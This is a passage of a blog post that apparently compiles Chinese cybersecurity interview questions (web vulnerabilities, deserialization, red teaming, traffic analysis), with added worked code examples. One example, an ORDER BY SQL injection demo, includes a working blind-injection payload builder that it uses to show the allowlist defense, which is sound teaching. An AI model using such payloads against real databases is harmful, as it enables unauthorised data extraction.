  6. Is there any place in the project that has been optimized by yourself?
  7. Have you done a penetration test on the website?
  8. Are you familiar with Linux operation, how to see the process PID
  9. What kind of database have you used? Answer: sqlite, mongodb, the interviewer doesn’t seem to know much about it, so why don’t you ask?
  10. Why use mongodb
  11. Do you know ES (Elasticsearch)
  12. HTTPS establishment process
  13. How does python manage memory
  14. The difference between deep copy and shallow copy
  15. Are python multi-processes, multi-threads, and coroutines useful? Where are they used?
  16. Can python achieve true multithreading
  17. Code question: ip sorting

(Just convert each address to a tuple and sort; remember to convert the octets from str to int, otherwise the string comparison puts 192 and 50 in the wrong order)

Input: iplist = ["1.1.1.1","192.168.1.110","10.192.2.4","10.50.2.3","10.50.2.10","111.120.12.1","172.18.5.112"]
Output:
1.1.1.1
10.50.2.3
10.50.2.10
10.192.2.4
111.120.12.1
172.18.5.112
192.168.1.110
  18. How to prevent SQL injection when writing a web API
  19. How to prevent XSS
  20. Do you understand unauthorized access vulnerabilities? Have you ever found one?
  21. Is there anything you're good at that I haven't asked about yet?
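A worked solution to the IP-sorting code question above (item 17), added here as an example and not part of the original write-up; the helper names `ip_key` and `sort_ips` are this example's own. It also shows what goes wrong when the addresses are sorted as plain strings.

```python
# Added example: sort dotted-quad IPv4 addresses numerically (interview question above).
# A plain string sort is wrong: "10.192.2.4" < "10.50.2.3" because "1" < "5".
# Converting each octet to int and sorting by the resulting tuple gives numeric order.
# The input list is the one from the question; the helper names are chosen here.
from typing import List, Tuple


def ip_key(ip: str) -> Tuple[int, int, int, int]:
    """Turn '10.50.2.3' into (10, 50, 2, 3); rejects malformed input."""
    parts = ip.split(".")
    if len(parts) != 4:
        raise ValueError(f"not a dotted quad: {ip!r}")
    octets = tuple(int(p) for p in parts)
    if any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"octet out of range: {ip!r}")
    return octets  # type: ignore[return-value]


def sort_ips(ips: List[str]) -> List[str]:
    """Numeric sort; the tuple key compares octet by octet as integers."""
    return sorted(ips, key=ip_key)


iplist = ["1.1.1.1", "192.168.1.110", "10.192.2.4", "10.50.2.3",
          "10.50.2.10", "111.120.12.1", "172.18.5.112"]

if __name__ == "__main__":
    # Naive string sort puts 10.192.2.4 before 10.50.2.3 and 10.50.2.10 before 10.50.2.3
    print("string sort:", sorted(iplist))
    for ip in sort_ips(iplist):
        print(ip)
```

In the standard library, `sorted(iplist, key=ipaddress.ip_address)` gives the same order and also validates each address; writing the key by hand is what the interview is checking for.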

Second round

  1. Questions about the project
  2. Which part of the project took the most time
  3. How to trace the source of an attack
  4. Give an example of attack traceability
  5. How to detect webshells
  6. What is the difference between SQL injection in MySQL and SQL Server
  7. Are you looking for a security development position or a security research position?

Code question: phone nine-grid (T9) keypad: input digits, output all letter combinations

  For example, input 23, output ['ad','ae','af','bd','be','bf','cd','ce','cf']
  8. Talk about the role of the DNS protocol and the resolution process
  9. Security issues of the DNS protocol
  10. Internship period
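A worked solution to the keypad combination question above, added as an example rather than taken from the original write-up; `KEYPAD`, `letter_combinations` and `letter_combinations_product` are names chosen here. The output order matches the page's sample for input 23.

```python
# Added example: phone keypad (T9 / nine-grid) letter combinations, interview question above.
# Input "23" -> ['ad','ae','af','bd','be','bf','cd','ce','cf'], as in the page's sample.
# Handles the empty string and rejects keys with no letters (0, 1, '*', '#').
from itertools import product
from typing import List

KEYPAD = {
    "2": "abc", "3": "def", "4": "ghi", "5": "jkl",
    "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz",
}


def _check(digits: str) -> None:
    for d in digits:
        if d not in KEYPAD:
            raise ValueError(f"key {d!r} has no letters on a phone keypad")


def letter_combinations(digits: str) -> List[str]:
    """Iterative build-up: extend every partial result by one digit at a time."""
    if not digits:
        return []
    _check(digits)
    results = [""]
    for d in digits:
        results = [prefix + ch for prefix in results for ch in KEYPAD[d]]
    return results


def letter_combinations_product(digits: str) -> List[str]:
    """Same result via itertools.product, the one-liner an interviewer may expect."""
    if not digits:
        return []
    _check(digits)
    return ["".join(t) for t in product(*(KEYPAD[d] for d in digits))]


if __name__ == "__main__":
    print(letter_combinations("23"))
```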

0x10 Huashun Xinan-Security Service Engineer

  1. Self introduction
  2. Red and blue team experience
  3. What do you know about the Shiro vulnerability
  4. Tell me about your app testing experience
  5. Which framework does Xposed use? Have you written app decryption yourself?
  6. Causes of XSS, SSRF and SQL injection, and how to fix them?
  7. What do you do if your XSS lands on the admin backend and you find it is on the intranet
  8. Suppose you are given a target site, what would you do?
  9. How much do you know about privilege escalation on Linux and Windows?
  10. Can you do process injection?
  11. How many incident responses have you done?
  12. Tell me what you do in incident response on Windows and Linux
  13. Have you used our Goby and FOFA?
  14. Can you decompile an APK?
  15. How is your Python?
  16. How do you audit PHP?


0x11 Qi Anxin Interview Review

  1. The MVC framework in detail
  2. Introduce SQL injection in detail
  3. The difference between XSS and CSRF
  4. The principle of CSRF and how to prevent it
  5. Is there anything else you're good at that wasn't asked?
  6. Explain the principle of XXE
  7. Which functions does XXE involve
  8. File upload, explained in detail
  9. What are the common web containers
  10. How to bypass the Apache 7.0 file upload blacklist, explained in detail
  11. What are the symmetric and asymmetric ciphers in cryptography?
  12. Is MD5 symmetric encryption
  13. Can Apache execute PHP files
  14. Which databases do you know
  15. Explain the principle of deserialization
  16. Which functions are used for deserialization
  17. Have you exploited XXE in practice
  18. Java multithreading
  19. What Python projects have you done and what did they do
  20. Where did you learn Python before

0x12 JD.com - Security R&D

  1. First, questions based on the resume
  2. Asked how one of my projects was completed // from the resume
  3. How are your Java fundamentals?
  4. Have you written some tools yourself?
  5. Have you thought about writing a scanner in the future?
  6. The basic principle of SQL injection and how to defend against it
  7. Have you learned about deserialization, especially in Java?
  8. How much of data structures do you remember
  9. What types of vulnerabilities do you mainly find on SRCs?
  10. How well do you understand the MSF framework
  11. Which databases do you mainly know, and which are you mainly learning
  12. The principle of SSRF and its defense ---> this went in depth

0x13 Anheng interview review

  1. Which sqlmap parameter dumps the current database name?
  2. Which nmap parameter does OS detection ---> uppercase or lowercase?
  3. What do nmap's lowercase o and a mean?
  4. What is the specific statement for boolean-based blind injection?
  5. The principle of wide-byte injection
  6. Does Python have deserialization?
  7. The difference between passing parameters via GET and via POST
  8. What are the HTTP request methods
  9. What a CDN does and how to tell whether a site is behind one
  10. How to find the server's real IP
  11. Describe the information-gathering process in detail
  12. How to tell whether a string is base64
  13. What is the principle of the rail fence cipher
  14. How to distinguish base64 from MD5
  15. What is the default port of Oracle
  16. Where is the MySQL administrator password usually stored?
  17. If the substr() function is disabled, how many replacement functions can you think of
  18. How to exploit Redis: which port, specific commands, specific steps
  19. How to learn the other party's IP from an email
  20. Talk about the same-origin policy
  21. How to collect webmaster email addresses, etc.
  22. What are the dangers of SSRF
  23. How to defend against SSRF --> a deeper question ----> recommended to study further
  24. How to distinguish between two files in Linux (I forgot which two files exactly)
  25. The MSF framework, asked in a little more depth
  26. What are the parsing vulnerabilities of web containers (middleware) and their principles
  27. How to prevent SQL injection ---> this question went very deep

0x14 Zhejiang east coast detection

  1. XSS tags
  2. Tell me about what you are most proud of during your years in college
  3. Briefly talk about SQL injection
  4. Talk about offset injection
  5. Tell me about the types of CTF challenges you do
  6. The most difficult web CTF challenges you have encountered
  7. Do you understand XXE? Have you audited for it yourself?
  8. Talk about deserialization
  9. Talk about bypasses
  10. If you were asked to design a WAF, how would you design it
  11. Do you understand intranet penetration and privilege escalation?
  12. Which SRCs do you usually mine
  13. Have you written any scripts by hand?
  14. Talk about SQL injection: how to manually enumerate all database names

0x15 360-Security Engineer Internship

  1. Self introduction
  2. WAF and how to bypass it
  3. IPS/IDS/HIDS
  4. Cloud security
  5. How to bypass host security agents such as Security Knight (安骑士) and Safedog (安全狗)
  6. How the gopher protocol expands the attack surface
  7. Struts2 vulnerabilities
  8. UDF privilege escalation
  9. DOM XSS
  10. Database privilege escalation
  11. How to exploit Redis
  12. Intranet penetration
  13. Container security
  14. k8s / Docker escape
  15. Linux and Windows commands: filtering files, viewing a process's environment variables
  16. How to get a webshell when the web server and database are on separate hosts

0x16 Internship in a certain front-line laboratory

Technical round

  1. Interviewer: Hello, I heard that you have a strong wish to join our company. Why? Me: Because I have worked with your company's staff on a project, and I feel that in technology, hardware and compensation you are first-class in the industry.
  2. Interviewer: Then do you know about our laboratory? Me: I have looked into it, blah blah.
  3. Interviewer: Then let me introduce the directions of the laboratory; it is divided into three directions... Me: Okay, understood.
  4. Interviewer: Have you used our company's equipment in a project, and how was the experience? (meaning: talk about the advantages and disadvantages of the equipment) Me: Then I will tell the truth?
  5. Interviewer: No problem, I just want to hear your opinion. Me: I have used ..., the advantage is that it performs well and can detect more threat intelligence and the like (make something up); the shortcoming is that for detected and analysed threats it cannot give the specific traffic segment, so an attack cannot be confirmed effectively from the device alone. Without traffic characteristics it is not easy to correlate with other full-traffic devices. It may be a protection mechanism on the vendor's side, so that the protection signature database is not leaked.
  6. Interviewer: Do you know the principles and development process of mainstream equipment?
  7. Interviewer: You did traffic analysis in the project, right? Can you tell me a specific case? Me: I assisted in discovering a 0day during the national HVV exercise, and I independently discovered frp reverse-connection timing confirmation packets sending traffic out, Shiro deserialization and other vulnerabilities (I mainly talked about my ideas and process for discovering the frp reverse connection).
  8. Interviewer: Besides these regular signature discoveries, do you have any quick way to make a determination? Me: (sharing my own traffic analysis experience)
    1. Determine the type of event (determine what kind of attack it is; the analysis steps for SQL injection, brute-forcing and frp traffic are different).
    2. Determine the time of the event; first narrow down a time period.
    3. Determine the data flow: whether to look at HTTP, TCP or SSH for the attack's data flow.
    4. Analyse whether it is intranet -> extranet or extranet -> intranet. The two directions have different query methods, and the right query gets results by analysing fewer packets. For example, once intranet -> extranet is determined, the first step must be to check the traffic of the external IP to judge its behaviour; extranet -> intranet usually means an external server has been taken as a pivot, so we must first analyse the victim server on the intranet to see whether it was successfully attacked.

    First we need to confirm the attack behaviour, and only then go into deeper traffic analysis and incident response; many alerts are false positives. Packet size is also an analysis criterion, and analysing SSL traffic requires decryption.
    Brute-force attacks: protocols such as SMB, SSH and MSSQL are the most common. Look at packet sizes: the packet for a successful login is large. Look at the number of ACK and SYN packets: if the attack succeeded there are at least 20, or at least 40 when loaded into Colasoft, but note that failed packets and retransmitted packets do not count (note that encrypted streams also have many ACK and SYN packets, one from the client and one from the server).
    Retransmission attacks: if a capture is very large, one or several GB, consider whether packets were retransmitted and check the retransmission count. By analogy with refreshing a page: if the retransmission count is very high in a short time it is machine-driven and judged to be an attack.
    When we find an attack (such as SQL injection after logging into a platform) we can use the traffic retrospection device to capture the logged-in user's username and password, log into the platform ourselves and try the discovered payload to see whether the injection succeeds.
  9. Interviewer: I heard that you also worked on a red team? What project was it and what was your role? Me: I introduced my project experience, then said I was the attacker in charge of initial access (打点) in the red team (we fought alone without backup, and there were no players good at intranet work).
  10. Interviewer: Tell me about the results of your project. Me: ...
  11. Interviewer: Tell me about the problems you encountered in the project. Me: We got a webshell on a Ruijie router through an exp, but got stuck on the reverse shell; it would not connect back.
  12. Interviewer: Then tell me, have you thought about this problem after the project ended, have you consulted others, and what is the solution? (I feel they attach great importance to thinking and problem solving, and to closing the loop on a project) Me: I asked friends who have also taken Ruijie routers, and I think the database and website are separated, so I could only get webshell permissions.
  13. Interviewer: How do you quickly and accurately determine assets? Me: Through FOFA, Google dorks, ZoomEye, some registration information.
  14. Interviewer: What is the FOFA syntax?
  15. Interviewer: How do you quickly identify vulnerabilities in these assets? Me: The fastest way is to run a scanner once first, then gather information and conduct targeted attacks, or use FOFA syntax to collect targeted information in the asset table to see if there is a particular CMS or OA system....
  16. Interviewer: General scanning will get you banned; what do you do? Me: My first choice is an IP pool proxy, or using 5G.
  17. Interviewer: Your information gathering and attacks are not very efficient. After the project ended, did you think about a solution? Me: Integrating the tools, but it is not written yet (again the pain of weak coding).
  18. Interviewer: Have you learned about the technique national HVV red teams use to hide traffic from the firewall? Me: I know about it, but I am not very good at it, and I have nowhere to learn it (a bit embarrassing).
  19. Interviewer: Do you have any special methods when doing initial access? Me: Besides searching for characteristic OA systems, we also collect mail systems from the assets, gather information and log into the mail system, collect various configuration files and database files, and log into website backends. We successfully logged into two website backends and one mail system, and also took a few OAs.
  20. Interviewer: Are you targeting specific OAs because you have 0days? (laughs) Me: Our team has 0days and half-days for these OAs.
  21. Interviewer: How about the development side? Can you start developing directly? Me: With Python I can develop a few small tools myself, but Java I can only read (so embarrassing that I really can't; maybe because I haven't studied security long enough; I originally wanted to focus on code this year).
  22. Interviewer: So you can only develop a few simple scanning scripts, right? (everyone must learn to code well) Me: Yes (embarrassed smile), recently I am learning to write PoCs with pos3.
  23. Interviewer: If you come for an internship, what kind of learning do you want to do? Me: (I chose a direction biased towards defense, because I know I am not good enough at attack, and I am very self-aware) Then some questions about how many months I can work and when I can start.

In summary, I think the interviewer saw my shortcomings as: the red team's attack and information-gathering efficiency is not high and needs improvement, and there may be a lack of post-project reflection and solution ideas.
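The brute-force heuristic narrated in the technical round above (many short SMB/SSH/MSSQL sessions from one source in a short window, with the successful login standing out by a much larger server response) can be turned into a small detector over flow records. The following is an added illustration of that heuristic, not code from the page or the candidate; the `Flow` record layout, the thresholds and the sample flows are assumptions constructed for this example.

```python
# Added example: flag password brute-forcing from per-connection flow records, following
# the heuristic in the interview recap: count completed handshakes (one per Flow) from a
# source to an auth service within a window, then look for the one session whose
# server->client byte count is far above the rest, which is the probable successful login.
# Record layout, thresholds and sample data are constructed for this example.
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

AUTH_PORTS = {22: "ssh", 445: "smb", 1433: "mssql"}
MIN_ATTEMPTS = 20        # the recap's "at least 20" SYN/ACK exchanges
WINDOW_SECONDS = 60      # attempts must fall inside this span
SUCCESS_RATIO = 5.0      # a session this many times the median is the likely success


@dataclass(frozen=True)
class Flow:
    ts: float           # connection start, epoch seconds
    src: str
    dst: str
    dport: int
    server_bytes: int   # bytes sent server -> client (one Flow = one completed handshake)


def detect_bruteforce(flows: List[Flow]) -> List[dict]:
    by_pair: Dict[Tuple[str, str, int], List[Flow]] = defaultdict(list)
    for f in flows:
        if f.dport in AUTH_PORTS:
            by_pair[(f.src, f.dst, f.dport)].append(f)

    findings = []
    for (src, dst, dport), fl in by_pair.items():
        fl.sort(key=lambda f: f.ts)
        # densest WINDOW_SECONDS span for this src/dst/service triple (two-pointer sweep)
        best_lo, best_hi, lo = 0, -1, 0
        for hi in range(len(fl)):
            while fl[hi].ts - fl[lo].ts > WINDOW_SECONDS:
                lo += 1
            if hi - lo > best_hi - best_lo:
                best_lo, best_hi = lo, hi
        window = fl[best_lo:best_hi + 1]
        if len(window) < MIN_ATTEMPTS:
            continue
        # failed logins are all roughly the same size; the successful one is the outlier
        sizes = sorted(f.server_bytes for f in window)
        median = sizes[len(sizes) // 2]
        big = [f for f in window if f.server_bytes > SUCCESS_RATIO * median]
        findings.append({
            "src": src, "dst": dst, "service": AUTH_PORTS[dport],
            "attempts": len(window),
            "likely_success_at": big[0].ts if big else None,
        })
    return findings


def sample_flows() -> List[Flow]:
    """Constructed data: 25 SSH logins from 10.0.0.5 in 25 s, the 23rd succeeds
    (large server response); three normal admin sessions that must not alert."""
    flows = [Flow(1000 + i, "10.0.0.5", "10.0.0.20", 22, 1600 if i == 22 else 280)
             for i in range(25)]
    flows += [Flow(2000 + i * 600, "10.0.0.9", "10.0.0.20", 22, 9000) for i in range(3)]
    return flows


if __name__ == "__main__":
    for finding in detect_bruteforce(sample_flows()):
        print(finding)
```

The size-outlier step only works when the failed attempts are uniform, which is the case for SSH, SMB and MSSQL authentication failures; for TLS-wrapped logins the recap's caveat applies and the byte counts say little without decryption.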

HR round

  1. Tell me about your experience first
  2. You are only a sophomore and should be a junior; how did you teach yourself security in school?
  3. How did you get into security?
  4. What are you studying now?
  5. What is your recent study plan?
  6. How do you balance your regular courses and security study in college? Do they conflict?

0x17 Tencent-Keen Lab Internship

First round

Duration: one and a half hours

  1. TCP three-way handshake
  2. Describe a penetration testing process
    1. Talked about a code audit
  3. SSRF vulnerability
  4. The general process of intranet penetration
  5. Describe another difficult penetration test
  6. What intrusion detection methods does the defender have, and what traces can be caught?
  7. Introduce processes and threads
  8. The relationship between process and thread memory spaces
  9. Introduce parent and child processes
  10. Orphan and zombie processes
    1. I got them the wrong way round
  11. When a process is killed, what happens, from the perspective of parent and child processes
  12. Several ways to get a reverse shell
    1. The essence is to use the TCP protocol to carry the bash program
  13. The categories of the ATT&CK matrix, introducing the C&C part
  14. Getting the result of command execution out through a domain name
    1. I didn't hear this part clearly and said directly in the interview that I didn't know. I still couldn't hear it clearly when replaying the recording, but it seems to be asking about getting command-execution output via DNS resolution.
  15. Linux command wildcards
  16. About ten minutes of questions on HVV traceability and threat analysis
    1. Couldn't do it at all; I will never write HVV (护网) on my resume again
  17. What methods does the defender have in the xx offensive and defensive drill? The questions were quite involved, mainly about intrusion trace detection and source tracing.
    1. This part did not go well
  18. Introduce SVM and KNN
  19. Introduce convolutional neural networks
  20. Levenshtein distance
  21. Search engine algorithms
    1. Didn't know much; I talked about tries (dictionary trees)
  22. Inverted index
  23. Malicious samples: given the MD5s of each family's functions, how to classify
    1. From the perspective of statistical patterns
  24. Questions for the interviewer

Second round

Duration: half an hour

  1. The first question went straight to HVV, almost the same as in the first round, and I was cracked right away
  2. Linux boot auto-start methods
  3. Introduction to init.d scripts
  4. How to check which files a program opens on Linux
  5. How to monitor file operations on Linux
    1. I was already very flustered by this point. I am not very good at operating Linux, and the interviewer kept sighing at me
  6. What system calls does Linux have
    1. Couldn't answer
  7. GDB debugging
    1. Couldn't answer
  8. View open network ports and multi-thread status on Linux
  9. Ways to get a reverse shell
  10. How to hide files on Linux
  11. Subdomain collection
  12. DNS rebinding
  13. DNS resolution process
  14. C&C traffic
    1. Never heard of it
  15. SSH tunnel
    1. I didn't hear clearly during the interview; when I heard "tunnel" I thought it was UDP tunnelling
  16. Introduction to the HTTPS certificate mechanism
  17. Some ways of using Burp Suite, and how to develop plug-ins
  18. Basic nmap operation
  19. SYN half-open connection principle
  20. Redis exploitation
  21. runc container escape principle
  22. Common WAF types (I don't know why they asked about Chaitin's WAF)
  23. UAF in MySQL
    1. Haven't heard of it
  24. Algorithm question (relatively simple, leetcode easy level)
  25. Linux inter-process communication
  26. Questions for the interviewer

0x18 Interview review of a four-character factory

First round

  1. I see you do a lot of Java; talk about the principle and exploitation of Java memory shells (内存马)
  2. Then how do you detect and kill Java memory shells: tools and principles
  3. Do you understand Behinder (冰蝎) and Godzilla (哥斯拉)? Explain the principle
  4. What did you do as an intern at other companies before?
  5. Do you have real-world experience bypassing WAFs? Talk about it from the perspective of the various vulnerability classes
  6. Are you familiar with webshell evasion? Explain the principle
  7. Have you done other evasion, such as combining CS and msfvenom
  8. Talk about the principle of fastjson deserialization and the common gadget chains
  9. Are you familiar with data structures? Explain the principle of the red-black tree
  10. Java's HashMap uses a red-black tree; explain how HashMap works
  11. Do you have experience in traffic analysis?
  12. Talk about code audit experience
  13. I see you have some CNVDs and CVEs; talk about the process of finding them
  14. Have you played a well-known CTF? Tell me about it
  15. You're familiar with intranet penetration, domain controllers, etc.; talk about real-world experience
  16. Explain the principle of the CC chains in Java deserialization
  17. I see you have rewritten sqlmap; have you read the sqlmap source code?
  18. I see you are familiar with MySQL; talk about indexes, storage structures, etc.
  19. Why does MySQL use B+ trees
  20. Have you read the MySQL source code?
  21. Have you analysed binary vulnerabilities?
  22. Have you ever written anything in assembly
  23. Talk about vulnerabilities in the Linux kernel
  24. Have you ever found a buffer overflow vulnerability?
  25. Do you understand Python sandbox escape?
  26. Talk about Flask template injection (SSTI)
  27. I see you have done projects related to abstract syntax trees; talk about that
  28. Explain the concept and principle of RASP
  29. Talk about RASP evasion
  30. Talk about security issues in the PHP and Go languages themselves
  31. Do you know about machine learning and algorithms?
  32. I see you have tried to write a simple operating system; talk about your ideas
  33. Do you have anything to ask me

Second round

  1. Tell me about the most memorable vulnerability you have found
  2. Tell me about the security tools you have written, their approach and principles
  3. Talk about how to bypass a WAF when uploading files
  4. Exploiting SSRF and the means of circumventing a WAF
  5. Talk about how to exploit MSSQL if xp_cmdshell cannot be used
  6. What do you do with an RCE that has no output (no echo)?
  7. Without sqlmap's --os-shell, how do you write a shell through the various databases
  8. Given a relatively large log, how should it be analysed
  9. Talk about what problems unauthorized Redis access can cause
  10. Talk about the SYN flood principle, defenses and detection methods
  11. Talk about the principle, defenses and detection methods of UDP reflection amplification
  12. Tell me about your strengths
  13. Do you have anything to ask me

Third round

  1. Talk about the padding oracle attack
  2. The principle of fastjson deserialization and the principle of the 1.2.47 bypass
  3. What functions other than readObject trigger deserialization?
  4. Talk about the chains you are most familiar with among the CC chains
  5. The principle of Shiro-550 deserialization and how you would write a tool for it
  6. The most impressive analysis process among the Spring/Struts2 RCEs
  7. Say as many WAF-bypass techniques for SQL injection as you can
  8. The principle of chunked transfer encoding for bypassing a WAF
  9. What are the ways to bypass a WAF when uploading files
  10. Tell me about the most impressive of the CVEs you have found
  11. What are your greatest strengths and weaknesses
  12. Which field of security do you want to work in in the future?
  13. How are your grades at school? Did you fail any subjects?
  14. Do you have anything to ask me

0x19 Internship interview review of a four-character factory

First round

  1. Self introduction
  2. Advantages of arrays vs linked lists and the reasons
  3. Explain the difference between a process and a thread at the operating-system level
  4. Thread and process communication methods and data-safety issues
  5. Scenarios for choosing multi-process vs multi-thread, and why
  6. Which WAFs do you know; explain the principle
  7. Say as many WAF-bypass techniques for SQL injection as you can
  8. What payload length do you use when fuzzing around a WAF?
  9. What regex rules have you written; talk about specific scenarios
  10. Write a regex for IPv4 on the spot, without looking anything up
  11. The deserialization principle of fastjson
  12. What kind of security problems can the Java reflection mechanism cause?
  13. The similarities between XSS and CSRF and how to use them together
  14. The location and principle of the CSRF token and bypasses
  15. Name as many HTTP headers as you know
  16. The principles of nmap's common scan types and of NSE scripts
  17. I see you have a lot of CNVD certificates; tell me about the process of finding the vulnerabilities
  18. Tell me what you learned from the certifications you have taken
  19. I see you have many projects on GitHub
  20. Do you think you have any highlights?
  21. What do you want to ask me
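For item 10 above, an IPv4 regex written the way the interviewer expects, together with the inputs that expose the usual mistakes (octets above 255, leading zeros, five groups, partial matches inside longer strings). This is an added example, not from the original write-up; `OCTET`, `IPV4_RE`, `NAIVE_RE`, `is_ipv4` and `find_ipv4` are names chosen here.

```python
# Added example: an IPv4 regex for the interview question above, with the inputs that
# catch the common mistakes. Names are chosen for this example.
import re
from typing import List

# One octet, 0-255, no leading zeros beyond a bare "0":
#   25[0-5]   250-255      2[0-4]\d  200-249
#   1\d\d     100-199      [1-9]?\d  0-99
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4_RE = re.compile(rf"^{OCTET}(?:\.{OCTET}){{3}}$")

# The naive first draft: accepts 999.999.999.999 and matches inside 1.2.3.4.5
NAIVE_RE = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")


def is_ipv4(s: str) -> bool:
    """Whole-string validation of a dotted quad."""
    return IPV4_RE.fullmatch(s) is not None


def find_ipv4(text: str) -> List[str]:
    """Extract addresses from free text (e.g. log lines). The lookarounds stop the
    pattern from matching a tail of 256.1.1.1 or a prefix of 1.2.3.4.5."""
    return re.findall(rf"(?<![\d.]){OCTET}(?:\.{OCTET}){{3}}(?![\d.])", text)


if __name__ == "__main__":
    for s in ["192.168.1.1", "256.1.1.1", "01.1.1.1", "1.2.3.4.5", "0.0.0.0"]:
        print(f"{s:16} strict={is_ipv4(s)!s:5} naive={bool(NAIVE_RE.search(s))}")
    print(find_ipv4("src=10.0.0.1 dst=256.1.1.1 x=1.2.3.4.5"))
```

The strict pattern deliberately rejects leading zeros ("01.1.1.1"); whether that is wanted depends on the source, since some libraries parse such octets as octal and others as decimal, which is itself a classic filter-bypass vector.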

Second round

  1. Self introduction
  2. Which web vulnerabilities are you familiar with; talk about them
  3. Principles of cross-origin solutions and their security issues
  4. How to choose between multi-process and multi-thread in Python
  5. What does Python's GIL essentially do
  6. Why does Java's JVM have GC roots
  7. Which garbage collectors does Java's JVM have?
  8. What are the disadvantages of reference-counting garbage collection
  9. How does CSRF get the cookie
  10. How to tell whether a website is a phishing site
  11. How do different domains get cookies via CSRF
  12. Talk about some common HTTP headers and their functions
  13. What HttpOnly essentially does
  14. Talk about balanced binary trees and binary search trees
  15. SYN flood attack principle and solutions
  16. What is the principle of SYN reverse probing
  17. Principle of TCP SYN cookies
  18. ARP spoofing attack principle and solutions
  19. What is an efficient way to probe UDP ports
  20. What are nmap's FIN scan and NULL scan
  21. Talk about how the sequence number changes during the three-way handshake
  22. What are Python's value types and reference types
  23. Are Python's list and dict thread-safe?
  24. Tell me about the project you gained the most from
  25. What do you want to ask me

Third round

  1. Self introduction
  2. Explain CSRF
  3. Talk about SSRF with practical examples
  4. Talk about RCE with practical examples
  5. Why are file upload vulnerabilities so rare now?
  6. Do you understand WAFs based on semantic analysis?
  7. Tell me about what you did in your last internship
  8. Talk about a few impressive vulnerability-hunting experiences
  9. Tell me about your plans for the future
  10. Are you willing to convert to a full-time position (转正)?
  11. What do you want to ask me

Fourth round (HR)

  1. How was the interview experience?
  2. Talk about your ideals in life
  3. Earliest start date for the internship

0x1A A two-character factory interview review

First round

  1. Self introduction
  2. What did you do in your first two internships?
  3. A math problem of medium difficulty
  4. Java class file structure
  5. Do you understand how Kafka works?
  6. fastjson deserialization principle
  7. Tell me about the field you have researched most deeply

Second round

  1. Prepared statements cannot be used for ORDER BY (sorting); how do you defend?
  2. From the two perspectives of white box and black box, talk about the vulnerabilities you have found
  3. SSRF bypass and defense
  4. Talk about how code audit tools such as Fortify work
  5. Talk about the principle of prepared statements (precompilation) from the perspective of stored procedures
  6. How does CSP defend against XSS
  7. Why can CSRF be defended with a token
  8. Given a project, talk about your audit approach
  9. Intranet-related questions
  10. Tell me about the logic vulnerabilities you have found
  11. Tell me about something you have written in Go
  12. What is security
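For item 1 above: a bound parameter can only stand in for a value, not for an identifier, so the usual prepared-statement defense does not cover `ORDER BY column`. This added example (not from the page or any project; the `users` table, its rows and the function names are constructed here) shows the interpolated version leaking data through row order, and the allowlist that is the standard fix.

```python
# Added example: ORDER BY cannot be parameterised, so the sort column must be mapped
# through an allowlist instead of being taken from the request. Uses sqlite3 only;
# the users table, its rows and all function names are constructed for this example.
import sqlite3
from typing import List

ALLOWED_COLUMNS = {"id", "username", "created_at"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, created_at TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "carol", "2023-01-03"), (2, "alice", "2023-01-01"), (3, "bob", "2023-01-02"),
    ])
    return conn


def list_users_vulnerable(conn: sqlite3.Connection, sort: str, direction: str = "asc") -> List[str]:
    # Request-controlled text spliced into ORDER BY: the query stays syntactically valid,
    # but an expression such as CASE WHEN (subquery) THEN id ELSE username END turns the
    # row order into a boolean oracle (blind injection without any error or UNION).
    sql = f"SELECT username FROM users ORDER BY {sort} {direction}"
    return [row[0] for row in conn.execute(sql)]


def list_users_safe(conn: sqlite3.Connection, sort: str, direction: str = "asc") -> List[str]:
    # Only identifiers from the allowlist reach the SQL text; everything else is rejected.
    if sort not in ALLOWED_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort!r}")
    if direction.lower() not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported direction: {direction!r}")
    sql = f"SELECT username FROM users ORDER BY {sort} {ALLOWED_DIRECTIONS[direction.lower()]}"
    return [row[0] for row in conn.execute(sql)]


def oracle_probe(username: str) -> str:
    """Attacker's sort parameter: order by id if the user exists, else by username."""
    return (f"(CASE WHEN (SELECT count(*) FROM users WHERE username='{username}')=1 "
            f"THEN id ELSE username END)")


if __name__ == "__main__":
    db = setup_db()
    print("true  probe:", list_users_vulnerable(db, oracle_probe("alice")))
    print("false probe:", list_users_vulnerable(db, oracle_probe("mallory")))
    print("safe       :", list_users_safe(db, "created_at", "desc"))
```

The same idea applies to table names, LIMIT/OFFSET in some drivers, and any other position where the grammar does not allow a placeholder: map the user's choice to a fixed set of server-side strings and never splice the raw value.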

Third round

  1. Tell me your own ideas for writing ysoserial
  2. How to exploit further after confirming a SQL injection vulnerability
  3. Explain the vulnerability principles of Weaver (泛微) OA
  4. Talk about the newly released Confluence RCE
  5. What did you do in previous internships?
  6. *** principle and bypass in practice
  7. Talk about the process of red-blue confrontation

Fourth round

  1. Java deserialization principles and tools
  2. Talk about fingerprinting methods
  3. The principle of Shiro deserialization tools
  4. How to find the SQL injection point without using sqlmap
  5. Tell me about the CVEs you have found
  6. Do you know anything about binary?

0x1B A security company - security researcher

First round

  1. Tell me about the principles of the several Burp plug-ins you wrote
  2. Have you done any JavaWeb projects?
  3. Pick one of CC1-CC7 that you are familiar with and explain the principle
  4. Talk about the principle of fastjson and Jackson deserialization
  5. Can BCEL use other class loaders
  6. Talk about XStream deserialization
  7. What is the most basic principle of deserialization
  8. Do you understand the principle of JEP 290?
  9. Talk about the principle of RMI and related vulnerabilities
  10. How JdbcRowSetImpl triggers JNDI injection
  11. The differences between the four Transformers in the CC chain
  12. Tell me about the CVEs and CNVDs you have found
  13. What are the trigger points for deserialization besides readObject?
  14. Talk about Spring-related RCE principles
  15. Talk about the principle of IIOP and T3 deserialization
  16. Deserialization in PHP and other languages

Second round

  1. How many years have you done security
  2. What do you want to do in the future
  3. Tell me about what you did during your internship
  4. Work location requirements

Finally

I have organized all these interview questions into a PDF document. If you need it, follow me and it will be sent automatically.

Origin: blog.csdn.net/2301_77152761/article/details/131245625